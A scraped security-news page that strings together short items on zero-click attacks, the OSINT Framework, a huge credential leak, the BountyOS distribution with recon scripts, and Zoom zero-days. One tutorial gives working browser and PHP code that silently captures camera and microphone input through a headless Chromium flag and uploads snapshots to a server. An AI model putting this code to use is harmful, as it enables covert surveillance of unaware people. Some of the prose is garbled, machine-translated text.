Normal view
-
Darknet
- Systemic Ransomware Events in 2025 β How Jaguar Land Rover Showed What a Category 3 Supply Chain Breach Looks Like
Systemic Ransomware Events in 2025 β How Jaguar Land Rover Showed What a Category 3 Supply Chain Breach Looks Like
ShinyHunters Breach Gainsight Apps on Salesforce, Claim Data from 1000 Firms
AIPAC Discloses Data Breach, Says Hundreds Affected
What is Zero click Attack? Hacker exploit hidden bugs without user action
Zeroclick attacks exploit hidden bugs in phones and apps without user action, allowing hackers to gain control. Real-world examples like Stagefright and Pegasus highlight the risks. AI agents exacerbate the issue by automatically processing data, making it crucial to implement strong identity management and security measures to mitigate these vulnerabilities.
A Zero-Click Attack
A zero-click attack is a cyber threat that requires no action from the victim, allowing attackers to exploit vulnerabilities without any user interaction. This type of attack can compromise devices simply through the receipt of messages or calls.
AI agents are exacerbating the zero-click attack issue by automating responses and actions, making it easier for attackers to exploit hidden bugs without user awareness.
Understanding how zero-click attacks operate is crucial. They rely on the automatic processing of incoming data by devices, which can lead to unauthorised access.
Real-world examples like Stage Fright and Pegasus illustrate the dangers of zero-click attacks. These incidents highlight the vulnerabilities within common messaging systems and apps.
Zero-Click Attacks Have Evolved
Zero-click attacks have evolved, allowing hackers to gain remote control without any user interaction. The introduction of AI agents adds another layer of vulnerability to this concerning trend.
Pegasus, a notorious spyware, exploits vulnerabilities in communication apps, allowing hackers to access personal data without user engagement. This highlights the dangers of automated processes in technology.
Recent flaws in iMessage have demonstrated that even trusted platforms can be compromised through hidden exploits. This raises awareness about the need for enhanced security measures.
AI agents, while convenient, can inadvertently execute harmful instructions embedded in emails. The Eco Leak attack illustrates how easily sensitive information can be exposed without user awareness.
Software Vulnerabilities
Software vulnerabilities can be exploited through zero-click attacks, where systems unknowingly open themselves to threats. This highlights the importance of maintaining security and trust in interconnected systems.
Zero-click attacks exploit flaws in software without user interaction, making them particularly dangerous. Understanding how these vulnerabilities function can help users stay vigilant.
Keeping software updated is essential for reducing the risk of zero-click exploits. Most attacks rely on known vulnerabilities that can be patched by companies.
Identity and access management is crucial in defending against zero-click attacks. Controlling who has access to systems can significantly enhance security.
Implementing Strong Security Measures
Implementing strong security measures is essential to guard against zero-click and AI-driven attacks. Utilising identity verification and limiting permissions can provide a robust defence against these threats.
Isolating AI systems in sandbox environments can prevent potential attacks from spreading. This strategy helps to protect the main system from external threats effectively.
Using AI firewalls to monitor data inputs and outputs enhances security. These systems act as content filters to detect and prevent prompt injections and data leaks.
Adopting a zero-trust mindset is crucial in today's digital landscape. This approach encourages scepticism towards every message or link until verified as safe.
Hackers Steal Personal Data and 17K Slack Messages in Nikkei Data Breach
-
Darknet
- Deepfake-as-a-Service 2025 β How Voice Cloning and Synthetic Media Fraud Are Changing Enterprise Defenses
Deepfake-as-a-Service 2025 β How Voice Cloning and Synthetic Media Fraud Are Changing Enterprise Defenses
Misconfigured NetcoreCloud Server Exposed 40B Records in 13.4TB of Data
OSINT Framework: A Complete Guide to Open-Source Intelligence
Almost everyone and everything is documented in todayβs digital world. From social media to public records, there are countless examples of records and data freely available. But collecting, piecing together, and analyzing data with any real effectiveness requires special and often complex tools and techniques. The OSINT Framework is designed to help with this challenge. It offers a structured approach to collecting open-source intelligence, offers support and guidance to members of a range of professions, and enables them to rapidly locate reliable data within their fields of focus. These fields are often complex and require advanced software to parse large data sets and search a range of databases, including e.g. social media and other public forums.Β
What is OSINT?
Open-Source Intelligence is the practice of collecting, and analyzing data, and information available and legally free on the open web and other public domains. These data and records can be collected from social media, government databases, open forums, and other routes. The information must be. The practice must be within the bounds of the law, and other regulations must not be violated.Β
Conceptually, OSINT can be used in other various professions. In cybersecurity, OSINT can help track and pinpoint location of malicious actions, and activity. In the fields of journalism, it can help source verification. OSINT also has value to businesses, as it provides insight into market analysis and data on competitor activity.
Getting to Know the OSINT Framework
Rather than being a single piece of software, the OSINT Framework is a properly structured directory of tools, methods, and resources employed in open-source investigations. It sorts different OSINT resources into varying categories, enabling users to choose the appropriate tools for their needs.
Often, the framework is visually represented in the form of a tree, where every branch leads to specialized OSINT tools. This approach increases user-friendliness, even for beginners. Rather than undertaking general purpose internet searches, investigators can use tools in the framework that have undergone targeted categorization and deal with specific tasks like social media accounts, domain information, and image analysis, or email lookups.
Advantages of the OSINT Framework
The framework increases efficiency. Instead of general purpose searches, which can take considerable time, the framework quickly narrows the search to the relevant tools.
- The OSINT Framework also has a wide coverage. It spans various categories, such as usernames, emails, IP addresses, and phone numbers.
- Most of the tools contained within the framework are cost-free and simple to access, which speaks to the frameworkβs accessibility.
- Many OSINT resources are of established credibility and, therefore, reliable. This limits the probability of false data.
- The framework also maintains Ethical Standards in data collection by ensuring that the information is legally accessible and publicly available.
Most Important Parts of the OSINT FrameworkΒ Β
1. Analyzing Social MediaΒ Β
Large amounts of data can be collected from social media platforms such as Facebook, Twitter, Instagram, and LinkedIn. The OSINT Framework assists in analyzing user profiles, posts, connections, and social interaction patterns. This is specifically beneficial in the area of digital investigations and monitoring threats.Β Β
2. Domain and IP ResearchΒ Β
OSINT tools allow investigators to look up the registration, hosting, and IP history of a suspicious website. This is instrumental in cybersecurity when tracking harmful websites, identifying phishing domains, and other cases of phishing.Β Β
3. Monitoring Email and Username AccountsΒ Β
The OSINT Framework helps to determine the risk of compromised accounts through data exposure as well as potential identity theft through email or username checks.Β Β
4. Analyzing Images and VideosΒ Β
Fact-checking in journalism is made much easier when the tools used to determine the origin of a picture or video through a reverse image search and the examination of video metadata is available.Β Β
Geolocation and MappingΒ Β
Investigators can utilize tools provided in the OSINT Framework to examine maps, satellite imagery, and other location based tools or services. This is very beneficial in locating missing persons, tracking crimes, or in disaster response.Benefits for Cybersecurity and InvestigationsΒ Β
OSINT Framework remains invaluable for cybersecurity professionals as they identify and track potential cyber attacks, track and monitor hackers, and identify and follow harmful domains. For law enforcement, they can follow leads without resorting to sophisticated and invasive monitoring techniques. Organizations can track and monitor brand health and identify fraudulent activities, which is yet another way to help businesses.Β Β
Ethical hackers are other OSINT users, finding system exploits before malicious hackers can. Organizations incorporate additional security measures to deal with the potentially harmful OSINT.Β Β
Challenges of Using OSINTΒ Β
OSINT is accompanied by unique challenges as well.Β Β
- Information Overload β Having an abundance of data can make filtering the actionable insights almost impossible.Β Β
- False Information β Not every piece of data is useful and accurate, and thus needs to be verified before being acted on.Β Β
- Privacy Concerns β Respecting the law, especially regarding data privacy, is of utmost importance.Β Β
- Tool Limitations β Geography and jurisdiction can render investigative tools useless, and tools can also have limitations.Β Β
Best Practices for Using the OSINT FrameworkΒ Β
- Always start with a specific investigative objective.Β Β
- Cross-reference all data with a different source.Β Β
- Regularly check for updates on the framework tools.Β Β
- Follow the law and the ethics of the investigation.Β Β
- Document the investigation findings for future use.
ConclusionsΒ Β
The users of OSINT can find guidance from the OSINT Framework. From accurate and ethical information gathering in journalism and cybersecurity, OSINT will make accurate and ethical information gathering possible. OSINT, if approached from the right angles, will uncover information of immense value and insights hidden in plain sight.Β Β
HackersKingβs mission is to equip people with strategies and the understanding needed to work safely in the online environment. As a reputable provider of information technology and news, we have a commitment to awareness and education in cybersecurity, particularly in the practice of OSINT, to assist people and businesses.
Inside Dark Web Exploit Markets in 2025: Pricing, Access & Active Sellers
-
Hackersking
- Breach Directory: Search Over 16 Billion Public Leaked Records β Why It Matters and How to Stay Safe
Breach Directory: Search Over 16 Billion Public Leaked Records β Why It Matters and How to Stay Safe
Leaked information today is a norm unlike in the past. A recent observation by Cybernews, Kaspersky, and Forbes state that more than 16 billion accounts comprising emails, usernames, and passwords have been leaked and are spreading on the internet. This is the reason for the existence of the breachdirectory.org. They aid users to discover if their email, password, or even their accounts are part of a public breach. Before proceeding, users must first identify what the leaked information entails, the origins of the data, and what threats it may pose. A breach directory is a lengthy, searchable archive that consolidates emails and passwords from data breaches. Rather than being jumbled across the dark web, the data is stored in an accessible database.
Some parts of a breach directory can contain the following pieces of information:Β Β
- Usernames and email addressesΒ Β
- Plain text and hashed passwordsΒ Β
- Contact informationΒ Β
- Log in pagesΒ Β
- Session cookies and other metadata in certain instancesΒ Β
The quote βbreach directory. org search over 16 Billion Public Leaked Recordsβ demonstrates just how large these collections have become.Β Β
Where Did These 16 Billion Records Come From?Β Β
Recent investigations have found 30 different datasets which total around 16 billion credentials. Hereβs how they were collected:Β Β
- Infostealer Malware. Any malware on a compromised device can steal stored logins in the browser along with cookies and tokens.Β Β
- Old Breaches. Several records originate from leaks of the past that have been consolidated into massive collections.Β Β
- Credential Stuffing Lists. Attackers compile known logins and then attempt them on various platforms.Β Β
- Underground and Dark Web Forums and Dumps. Stolen information circulates in hacker markets and is later made publicly available.Β Β
- Some datasets are massive. One dataset contained 3.5 billion records associated with accounts from Portugal, another had 455 million records from Russia, and about 60 million records possibly related to Telegram users.
Why is this leak more dangerous than those in the past
Wider credential leaks have been around for quite some time, but there appears to be more 'weight' to theΒ 16 billion credential exposure:
- Fresh leaks - It appears that most infostealer malware of recent years has been successful as many of the credentials appear to be more recent and not recycled from previousΒ hacks.
- Details of leaks - Attackers can evade 2 Step Verification with ease as some of the leaks possess session tokens and cookies that contain login credentials.Β
- The scale of attacks - The leaked credentials appear to have the full spectrum as it includes accounts from virtually every part of the world, from gaming accounts to banking.Β
- Interrelated dangers - It is important to note that regardless of any duplicated login credentials, the attackers only require a single active login to inflict damage.Β
The ever-evolving risks you are likely to come across
- Account Takeovers - Accounts of users with a previous data breach get reused to gain access to social media and financial accounts.
- Impersonation - Statistics stolen as a data set makes it easier to pretend to be the target.
- Phishing Attacks - The deceptive messages that attackers throw are directed to targets crafted around the stolen information.
- Monetary Plunder - The breach only has saved login credentials to check for stolen money.
- Diminished Business Reputation - For organizations that suffer information breaches, it ruins the bond with clients and can place the business in a desperate legal position.Β
What have you done to see that you have not been targetedΒ
In case you want to check for accounts that are exposed, you should only rely on for accounts that have not a single trace of hacked passwords.
- Only provide your email address or username. Do not submit your password under any circumstance.Β
- If your email address appears on leaks, it is best to presume the password associated to it is compromised as well.Β
- You should change the associated account password and enable 2FA immediately.Β
What you should do right nowΒ
According to Kaspersky and Forbes professionals, the top five actions you should prioritize are as follows:Β
Replace your passwords.Β
Focus on your email, bank, and social media accounts as a priority.Β Your password should be sufficiently long, unique, and random.Β
Make use of a password manager.Β
Tools such as Bitwarden, 1Password, and LastPass are capable of creating and saving individual logins.Β
Enable 2FA.Β
Make use of app-based 2FA or hardware keys if available.Β
Remove passwords saved from the browser.Β
Infostealers are known to capture logins saved within your browser. Delete these logins and use a password manager.Β
Evaluate passkeys.Β Β
Passkeys are much safer than traditional passwords as they cannot be leaked. Many platforms now provide ways to log in without a password.Β
Practical example.Β
Letβs say you created a shopping account that is linked to the email and password of your main Gmail account. Your shopping siteβs database is compromised, and your login details are part of the 16 billion leaked accounts. Hackers are trying to use the same email and password combination on her Gmail account. That is the level of ignorance with credential reuse, which can compromise your online security.
Checklist for Security
- Delete outdated and reused passwords
- Enable MFA/2FA on every account you can.
- Use an approved password manager.
- Use passkeys instead of passwords.
- Update your system regularly to protect against infostealers.
- Review your accounts regularly for abnormal behavior.
You May Also Like: https://www.hackersking.in/2025/09/Bug-Bounty-OS.html
Conclusion β Hackersking Insights
More than a byte of info, the 16 billion records found leaked speak for the negligence of the fundamental rules of cyber security. Breach directories, though handy in determining exposed records, also reveal the magnitude of the issue at hand.
Proactive and responsive steps to any notified breaches are the core of the security we provide at Hackersking. Along with extended tech security insights, we provide immediate actionable measures for account securing to remain a step ahead of the threats.
With Hackersking, you can be certain- Stay secured, Stay aware, Stay informed.
Bug Bounty OS Specially Designed for Bug Hunters
Why BountyOS Fits the Bug-Huntersβ Workflow
Unlike general-purpose βhackerβ distributions that include hundreds of outdated or rarely used tools, BountyOS adopts a curated approach. It is based on the stable Debian 12 foundation, supports both amd64 and arm64 architectures, and ships with tools that work directly in live mode (no mandatory installation required). This makes it suitable for quick triage, portable use, and creating reproducible environments where tool freshness matters.
Key benefits for bug hunters:
- Live-mode readiness: Run tools without installing the OS to disk.
- Debian 12 base: Stability, security patches, and broad package support.
- Multi-architecture support: Works on both x86_64 and ARM devices.
Notable Tools Included in BountyOS
BountyOS ships with a compact but powerful toolset designed for modern bug bounty workflows. Some of the highlighted categories and tools include:
- Recon: amass, subfinder, assetfinder
- Scanning & Probing: httpx, nuclei, dalfox, gf, waybackurls
- Brute/Dir Fuzzing: ffuf, dirsearch, curated wordlists
- Networking & Discovery: massdns, dnsx, masscan
- Testing / Proxying: Burp Suite, OWASP ZAP, sqlmap
- OSINT & Enrichment: theHarvester, recon-ng
Installation and Availability
BountyOS provides downloadable ISO images for both supported architectures. It also supports live mode, which allows hunters to boot and run tools instantly without needing installation. For those who prefer a more permanent setup, installers are available to create a persistent environment.
Special Scripts and Practical Additions
Here are some practical scripts and shortcuts you can use within BountyOS to maximize productivity.
1) System Update & Toolchain Refresh
Save as bounty-update.sh:
#!/usr/bin/env bash
set -euo pipefail
echo "[*] Updating system packages..."
sudo apt update && sudo apt full-upgrade -y
echo "[*] Updating Go-based tools..."
if command -v go >/dev/null 2>&1; then
Β Β GO111MODULE=on go install github.com/projectdiscovery/httpx/cmd/httpx@latest
Β Β GO111MODULE=on go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
Β Β GO111MODULE=on go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
fi
echo "[*] Cleanup..."
sudo apt autoremove -y
echo "[*] Update Complete."
2) Recon Pipeline Script
Save as bounty-recon.sh:
#!/usr/bin/env bash
# Usage: ./bounty-recon.sh domain.com
TARGET="$1"
mkdir -p recon/$TARGET
echo "[*] Gathering subdomains..."
subfinder -d "$TARGET" -silent | tee recon/$TARGET/subs.txt
echo "[*] Probing live hosts..."
cat recon/$TARGET/subs.txt | httpx -silent -threads 50 -o recon/$TARGET/alive.txt
echo "[*] Running nuclei templates..."
nuclei -l recon/$TARGET/alive.txt -t /path/to/nuclei-templates -silent -o recon/$TARGET/nuclei-results.txt
echo "[*] Collecting wayback URLs..."
cat recon/$TARGET/alive.txt | waybackurls | tee recon/$TARGET/wayback.txt
3) Handy Aliases for Fast Usage
Add to .bashrc or .zshrc:
alias subf='subfinder -silent'
alias probe='httpx -silent -threads 50'
alias nuc='nuclei -silent'
Operational Tips
- Keep tools and templates updated regularly.
- Tune scan rates and threads carefully to avoid unintentional denial-of-service on targets.
- Always follow responsible disclosure policies before testing or reporting vulnerabilities.
How BountyOS Helps You Be More Efficient
- Reduced setup time: Preinstalled, curated tools let you start hunting immediately.
- Reproducible environment: Debian base ensures consistency across devices.
- Portable setup: Support for both x86 and ARM means you can run it on laptops, servers, and even some SBCs.
Conclusion
BountyOS is a streamlined and security-focused operating system built to empower bug bounty hunters with the right set of tools, stability, and live-mode convenience. It helps you move from boot to bounty quickly without unnecessary setup, so you can focus on finding vulnerabilities and reporting them effectively.
If you need more information, guidance, or deeper insights about BountyOS and other bug bounty resources, connect with us at Hackersking - your trusted space for security knowledge and updates.
Cybersecurity Workforce Trends in 2025 β Skills Gap, Diversity and SOC Readiness
New Scam Involving Fake Online Gaming Sites Flood Discord, Social Media
A new online scam is around luring users towards fake online gaming sites via socialβ¦
New Scam Involving Fake Online Gaming Sites Flood Discord, Social Media on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
Ransomware-as-a-Service Economy β Trends, Targets & Takedowns
Fake E-commerce Platforms as Attack Vectors & Threats in 2025
Permissionless Mic & Camera Access Using Chromium Browser
In this method, the Chromium flag --auto-accept-camera-and-mircophone-captureΒ is used that will automatically accept and allow a website to access the camera and microphone. This flag can be used with the --headlessΒ flag, allowing it to run invisibly to the user.
When navigating to a page, the target page should use getUserMedia to access the userβs media devices. I've created a function called captureCameraAndMic in the script below, which invokes getUserMedia with both video and audio set to true to capture the userβs camera and microphone.
<!DOCTYPE html>
<html>
<body>
<video id="video" autoplay playsinline></video>
<script>
function captureCameraAndMic() {
navigator.mediaDevices.getUserMedia({ video: true, audio: true }).then(stream => {
document.getElementById('video').srcObject = stream;
});
}
captureCameraAndMic();
</script>
</body>
</html>
To test that the camera and microphone inputs are being captured without any prompts, run the command provided below. Note that this command omits the `--headless` flag for testing purposes. Since we are not using the `--headless` option, you must close any running instances of the browser before executing the command. If you are using `msedge.exe`, please ensure to terminate all msedge processes before running the command.
[msedge.exe|chrome.exe] --auto-accept-camera-and-microphone-capture https://example.com/share.html
The camera and microphone should be accessible without any prompt.
Let's Create A Camera Snapshot taking site
This webpage takes camera snapshots every few seconds and saves them to our server. The script below has two functions:
startCapture --Β initializes the camera stream using getUserMedia, displays the video in <video>Β elements, and sets up a timer to take snapshots at regular intervals (in our case, every 3 seconds).
takeAndUploadsSnaphost -Β Captures a frame from the video, draws it into a hidden <canvas>, converts it to a PNG image, and sends it to upload.phpΒ using a POST request.
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<video id="video" autoplay playsinline></video>
<canvas id="canvas" width="1000" height="1000" style="display:none;"></canvas>
<script>
const video = document.getElementById('video');
const canvas = document.getElementById('canvas');
const context = canvas.getContext('2d');
function startCapture() {
navigator.mediaDevices.getUserMedia({ video: true }).then(stream => {
video.srcObject = stream;
setInterval(() => takeAndUploadSnapshot(), 3000);
});
}
function takeAndUploadSnapshot() {
context.drawImage(video, 0, 0, canvas.width, canvas.height);
const timestamp = Date.now();
const filename = `imgCapture-${timestamp}.png`;
const dataUrl = canvas.toDataURL('image/png');
fetch('upload.php', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
image: dataUrl,
filename: filename
})
});
}
startCapture();
</script>
</body>
</html>
The script sends the image's Base64 blob and file name to upload.php . The PHP script will be responsible for handling the incoming image data and Base64-decoding it, and saving it into /var/www/imgCapture. Keep in mind that upload.phpΒ should have permission to write in that folder; otherwise, you will face an error.
<?php
$data = json_decode(file_get_contents("php://input"), true);
if (!$data || !isset($data['image']) || !isset($data['filename'])) {
http_response_code(400);
exit;
}
// Extract img b64 data and filename
$imageBase64 = $data['image'];
$filename = $data['filename'];
// Remove "data:image/png;base64," from the beginning
$base64String = preg_replace('#^data:image/\w+;base64,#i', '', $imageBase64);
$imageData = base64_decode($base64String);
$uploadDir = '/var/www/imgCapture';
$filePath = $uploadDir . '/' . $filename;
if (file_put_contents($filePath, $imageData)) {
echo json_encode(['success' => true]);
} else {
http_response_code(500);
echo json_encode(['success' => false]);
}
?>
Now run the command with the --headless command and watch the camera captures folder gain new images every few seconds.
[msedge.exe|chrome.exe] --auto-accept-camera-and-microphone-capture https://example.com/share.htmlThe /var/www/imgCaptureΒ folder will now have audio and images saved.
I hope this information is helpful for you. Special thanks toΒ mrd0x.com, a cybersecurity researcher and ethical hacker, who introduced this technique and make sure to save bookmarks of our blog hackersking.in for future posts.
(2023) 7 Free Movie Streaming Sites USAβ Download HD Movies Online
Clop Ransomware Gang Got Arrested By Ukraine Police
Two Zero-Day Bugs Reported in Zoom Clients and MMR Servers Details Google
An investigation of the clickless attack surface for the popular Zoom video conferencing solution revealed two Zero-Day Bugs (previously unknown security vulnerabilities) that could be exploited to crash the service, execute malicious code, and even leak arbitrary areas of its memory.
Natalie Silvanovich of Google Project Zero, who discovered and reported the two flaws last year, said the issues affect both Zoom clients and Media Router (MMR) servers that relay audio and video content between clients on on-premises deployments.
The flaws have since been fixed by Zoom as part of updates released on November 24, 2021.
The goal of a no-click attack is to stealthily take control of the victimβs device without requiring any user interaction, such as clicking on a link.
While exploit features vary depending on the nature of the vulnerability exploited, a key feature of click-free hacks is their ability to leave no trace of malicious activity, making them very difficult to detect.
Two defects identified by Project Zero:
- CVE-2021-34423 (CVSS score: 9.8) is a buffer overflow vulnerability that can be used to crash a service or application or execute arbitrary code.
- CVE-2021-34424 (CVSS score: 7.5) is a process memory disclosure error that can be used to potentially obtain information about arbitrary areas of product memory.
While analyzing real-time transport protocol (RTP) traffic used to deliver audio and video over IP networks, Silvanovich discovered that it was possible to manipulate the contents of a buffer that supports playback of various types of data by sending a malformed chat message that causes the MMR client and server to crash.
Additionally, the lack of a NULL check that is used to detect the end of a string allowed for a memory leak when joining a Zoom meeting through a web browser.
The researcher also attributed the lack of memory corruption to the fact that Zoom did not enable ASLR, i.e., address space layout randomization, a security mechanism designed to increase the difficulty of executing buffer overflow attacks.
βThe absence of ASLR in the Zoom MMR process greatly increases the risk that an attacker can compromise it,β Silvanovich said. βASLR is perhaps the most important defense against memory corruption exploits, and the effectiveness of most other defenses at some level depends on the fact that it is disabled in the vast majority of programs.β
While most videoconferencing systems use open source libraries such as WebRTC or PJSIP to implement multimedia communications, Project Zero has identified Zoomβs use of proprietary formats and protocols, as well as high license fees (nearly $1,500) as barriers to research. in the field of security.
βClosed source software creates unique security challenges, and Zoom can do more to make its platform available to security researchers and others who want to evaluate it,β Silvanovich said. βWhile Zoom Security helped me access and set up the server software, itβs not clear if support is available for other researchers, and software licensing was still expensive.β
The post Two Zero-Day Bugs Reported in Zoom Clients and MMR Servers Details Google appeared first on OFFICIAL HACKER.